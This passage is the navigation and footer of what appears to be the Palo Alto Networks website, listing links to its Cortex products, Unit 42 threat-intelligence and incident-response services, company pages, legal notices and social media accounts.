* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar?ts=markdown)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse?ts=markdown)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response?ts=markdown)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam?ts=markdown)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42?ts=markdown)

* [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess?ts=markdown)

* [Incident Response](https://www.paloaltonetworks.com/unit42/respond?ts=markdown)

* [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform?ts=markdown)

* [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners?ts=markdown)

## Company

* [About Us](https://www.paloaltonetworks.com/about-us?ts=markdown)
* [Careers](https://jobs.paloaltonetworks.com/en/)
* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales?ts=markdown)
* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility?ts=markdown)
* [Customers](https://www.paloaltonetworks.com/customers?ts=markdown)
* [Investor Relations](https://investors.paloaltonetworks.com/)
* [Location](https://www.paloaltonetworks.com/about-us/locations?ts=markdown)
* [Newsroom](https://www.paloaltonetworks.com/company/newsroom?ts=markdown)

## Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/?ts=markdown)
* [Communities](https://www.paloaltonetworks.com/communities?ts=markdown)
* [Content Library](https://www.paloaltonetworks.com/resources?ts=markdown)
* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia?ts=markdown)
* [Event Center](https://events.paloaltonetworks.com/)
* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)
* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z?ts=markdown)
* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance?ts=markdown)
* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure?ts=markdown)
* [Sitemap](https://www.paloaltonetworks.com/sitemap?ts=markdown)
* [Tech Docs](https://docs.paloaltonetworks.com/)
* [Unit 42](https://unit42.paloaltonetworks.com/)
* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![PAN logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)
* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown)
* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center?ts=markdown)
* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown)
* [Documents](https://www.paloaltonetworks.com/legal?ts=markdown)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector?ts=markdown)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language